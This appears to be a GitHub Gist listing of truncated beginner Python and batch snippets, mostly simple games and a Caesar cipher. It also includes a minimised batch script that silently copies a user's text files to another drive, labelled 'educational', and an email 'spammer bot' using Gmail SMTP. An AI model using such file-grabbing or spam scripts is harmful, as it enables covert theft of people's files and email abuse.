Skip to content

Instantly share code, notes, and snippets.

@markusteim
markusteim / file.bat
Last active December 9, 2018 12:50
This is for educational uses only, don't misuse, I made it to find my files from pc
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\*.txt" "%drive%\all\My pics"
@echo off
cls
@markusteim
markusteim / cipher.py
Created December 9, 2018 12:13
caesar cipher
print ("-------------------------------------------")
print ("Welcome to the SUPER SECRET Caesar Cipher!")
print ("-------------------------------------------")
plaintext = input("Enter message : ")
alphabet = "abcdefghijklmnopqrstuvxyz"
n = input("Enter shift amount")
cipher = ""
import random
print ("----------------------------------------------------------------------")
print ("Welcome to the guessing game, you have 10 attempts to guess my number!")
print ("My number is between 1-100!")
print ("----------------------------------------------------------------------")
guess = 1
number = random.randint(1,100)
@markusteim
markusteim / pizza.py
Created December 5, 2018 09:30
pizza game
import math
totamount = 0;
width = int(input("Hello you majestic sir, how width do you wanna ur dough"))
heigth = int(input("and how heigth should ur dough be?"))
pizza = int(input("and your pizzas radius?"))
#print ("nice")
area = width*heigth
print (area)
@markusteim
markusteim / z.py
Created December 4, 2018 19:32
Zombie game
import time
from sys import exit
n = 0
class Bob:
def __init__(self):
self.võti = 0;
self.münt = 20;
self.hp = 100;
self.rünne = 5;
@markusteim
markusteim / rps.py
Created November 26, 2018 11:23
Easy Rock Paper Scissors Game
import time
import random
print ("------------------------------")
print ("WELCOME TO ROCK PAPER SCISSOR")
print ("------------------------------")
print ("\n\nRULES : 1) Please for yes or no questions answer y/n \n \t----------------------------------------------\n \t2)For rock, paper, scissor please choose r/p/s")
time.sleep(10)
ask = input("Are you ready to RUMBLEEEE!")
@markusteim
markusteim / zgame.py
Last active November 7, 2025 13:10
Python Based Text Game
import random
import time
import sys
import urllib.request
import urllib.parse
dragon = '''
@markusteim
markusteim / spammer.py
Last active November 27, 2018 20:27
WIFI SPAMMER BOT || DO NOT MISUSE, EDUCATIONAL PURPOSES ONLY
import smtplib
import random
import time
numb = 0
receivers = ["",""]#enter here your receviers
email_login = "" #put here your email
email_pw = "" #put here your password for the same email
server = smtplib.SMTP("smtp.gmail.com", 587) #port 587 for gmails only, for others search other ports